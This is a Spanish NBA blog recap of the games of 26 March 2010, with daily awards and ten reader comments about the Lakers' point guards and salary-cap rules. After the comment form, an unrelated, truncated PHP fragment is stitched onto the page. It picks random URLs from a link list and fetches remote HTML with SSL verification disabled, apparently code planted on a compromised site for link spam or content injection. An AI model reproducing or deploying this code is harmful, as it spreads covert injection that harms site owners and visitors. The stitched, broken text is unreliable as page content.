La Crónica (26/03/2010)

27 de March de 2010 por TheDeerHunter

No es frecuente ver tropezar a ambos líderes la misma jornada.

Los Cavs cayeron en San Antonio en un partido bien jugado por los locales, especialmente por Ginobili, en un estado de forma increíble. No fue el caso de los Lakers que se dieron un batacazo bochornoso en lo que empieza a ser una cancha maldita para ellos: el Ford Center de Oklahoma City. La imagen fue pésima y fueron superados en todos los aspectos. Todo queda retratado con los 9 balones perdidos de Kobe. Actuación para olvidar de la Mamba como también de la dupla Artest-Gasol.

Aprovecharon bien el regalo Orlando y Boston. Ganaron a Wolves y Kings en partidos sin historia. Los Nuggets le birlaron en el último segundo a los Raptors una victoria que estos tenían en sus manos. A perro flaco todo son pulgas y a un equipo con tantas dificultades para controlar los partidos se unen siempre genialidades de gente como Kobe o anoche Melo. El caso es que “jugaron como nunca para perder como casi siempre”.

Si ayer decíamos que, en la carrera por el segundo puesto del Oeste, Utah parecía más centrado que ninguno, hoy nos han dejado en evidencia siendo vapuleados por los Pacers de Granger. A Sloan le habrá sangrado la úlcera de ver la pésima defensa de sus pupilos. Otro tropiezo sonado ha sido el de los Hawks en Philadelphia, con Iguodala tocando la guitarra.

Todavía en la carrera de playoffs los Suns barrieron a los Knicks con actuación destacada de Leandrinho Barbosa, a quien su equipo ha echado tanto de menos todo este tiempo. También echaron de menos los Bucks a Delfino, retirado tras haberle caído Haslem encima de todo el cogote, así como a Bogut e Ilyasova que tampoco fueron de la partida. A los Heat también se les lesionó Jermaine, pero pudieron sobreponerse.

Terminamos con buenas noticias para Arenas, que no pisará la cárcel. Su equipo no lo pudo celebrar con victoria en Charlotte. Los Nets si lograron otra más contra los Pistons, con Brook Lopez, como es habitual, muy destacado.

PREMIOS

MVP: Danny Granger, por fin le acompaña juego y resultados. 44 puntos, 8 rebotes y 5 asistencias de auténtico jugón.

El rookie: Excelente dirección de Jrue Holiday para los Sixers. 13 puntos, 12 asistencias, 7 robos.

La sorpresa: La recuperación de Leandrinho. Uno de los mejores sextos hombres de la liga en condiciones normales.

La decepción: Las 9 pérdidas de Kobe Bryant. La casa de los Thunder es un infierno para los Lakers.

El mayor esfuerzo en vano: LeBron suele ser MVP si gana o MEV si pierde. Hoy toca lo segundo.

Comenta

10 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Que los mejores de lakers fuesen Odom y ……. Powell, ya lo dice todo de cómo ha sido de malo el partido para los angelinos. Necesitan un base como el comer, Westbrook hizo lo que le dío la gana.
    Hombre, VGundy le dió minutos a Ryan anderson después de muchos partidos quedandose sin jugar o haciendolo menos de 10 minutos, y éste respondió con un 19-9
    me gusta mucho Holiday, ya lo dije en el famoso articulo de Iverson, en el que comenté que su fichaje sería perjudicial para el desarrollo de este jugador, aunque al final, está jugando por la baja indefinida de AI.
    Muy buena la jugada de Iguodala en la que intercepta un alley-hoop, sube la bola, se la pasa a Kapono que tira de 3 y el rebote ofensivo lo coge el mismo Iguo y la revienta. Extraordinaria acción.
    Vaya cansatón sobre la bocina de Melo
    pobre lemontus, viendo su visceralidad, estará echo polvo con las bajas de Bogut, Ersan y Delfino. Ánimo Lemontus

      Citar

  2. LEmontus dice:
    #2

    A bucks se le atraganta el este menos mal que ahora viene memphis.

      Citar

  3. Toni dice:
    #3

    Ayer estuve escribiendo un comentario calcado al de Love Denise y saltaron los plomos en casa.
    Lo del base es bochornoso (aunque estoy de acuerdo que luego Fisher hizo lo que hizo), en playoff ya estuvo a punto de eliminarlos Brooks solito y este año en post temporada tenemos a Hill, Nash, Deron, Westbrook (pedazo de jugador), Billups y no podemos dar por muerto a Kidd que los pueden destrozar, creo que deberian haberse movido mejor en la noche del draft y haber utilizado a Brown o Farmar como moneda de cambio por algun jugon como Holiday o Lawson que practicamente no juega en Denver.

    Lemontus, ¿estará Bogut contra Memphis?
    Por que vuelve Marc…

      Citar

  4. Viva_Dirk dice:
    #4

    Hombre Toni no se quien habria cambiado a Holiday o Lawson por uno de los 2 que dices. Además no suele ser Phil de los que da mucha bola a los rookies.

      Citar

  5. Txusma dice:
    #5

    Ya avisaron que Holiday llegaba muy verde a la liga pero que había potencial. Al final ha tenido la suerte de disponer de minutos y aprovecharlos sobretodo en este final de temporada. El año que viene le toca confirmar.

      Citar

  6. Love Denise dice:
    #6

    si mis cuentas no em fallan, creo que el único base medio decente como free agent para el año que viene es Raymond Felton, que está cobrando este año 5,5 m$. No sé hasta qué punto los Lakers podrían plantearse su fichaje, no será por la pasta supongo, porque éstos ya han demostrado los últimos años que no le importan mucho pasarse del limite salarial.
    En algunas webs con información sobre los salarios de los equipos, aparece Bigote Morrison como expiring, en cambio en otras aparece como que el año que viene cobrará 6,8 m$ (casi nada). Yo pensaba que era expiring, pero ya no sé cual creerme

      Citar

  7. HeiNeKeN dice:
    #7

    Segun creo, lo que Morrison tiene es opcion de Qualifying Offer de 6,8 millones y dudo mucho que los Lakers usen esa opcion…

      Citar

  8. Viva_Dirk dice:
    #8

    Denise, que a Los Lakers no les importe pagar mucho en salario no quiere decir que puedan ofrecerle un contrato alto a Felton. Nos hace falta una serie de posts de Dantley sobre este tema, pero básicamente quienes pueden ofrecerle un contrato a los agentes libres son su propio equipo o los que esten por debajo del límite salarial, que ahora mismo esta en unos 55 millones, los Lakers sin Morrison e incluso sin Farmar los Lakers estarían por encima de 70 millones.

    El máximo que podrian ofrecer los Lakers seria la mid-level excepcion, que ahora mismo debe rondar los 4 millones por abajo y hace unos años estaba en esos 5.5 millones. Luego los equipos que estan rozando el límite pero se pasan pueden renunciar a las excepciones y mas historias, pero eso ya digo que es mejor que lo explique Dantley que es el experto.

      Citar

  9. Toni dice:
    #9

    Siento no haber podido contestar antes pero no se, viendo a Farmar quizá Phil se la hubiera jugado porque en un equipo donde estan Kobe, Pau, Odom, Bynum, Artest, demasiado dificil no es…

      Citar

  10. TheDeerHunter dice:
    #10

    En mi opinión Farmar está haciendo una correcta campaña, bastante mejor de la que me esperaba.
    De Fisher todavía espero mucho, aunque sea a cuentagotas. Mientras no se demuestre lo contrario o se retire, lo esperaré toda la vida.

    Para Phil Jackson el base es un concepto sobrevalorado. Lo ha demostrado siempre.
    Sus grandes bases son rollo Kerr, Fisher, Ron Harper, Brian Shaw, Paxson, PJ Armstrong… sin entrar a valorar las funciones propias de esta posición que, en realidad, aportaban.
    En cambio otros bases más típicos como Payton fracasaron estrepitosamente.

    Si tuviera que reforzar a los Lakers no pensaría en tirar a Farmar (jugando como este año, ojo) ni mucho menos a Fisher.
    Lógicamente siempre querría fichar a un Chris Paul… pero me da que ese tipo de cosas son imposibles en un lugar donde Kobe y Pau ya casi se comen entre los dos el límite salarial.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>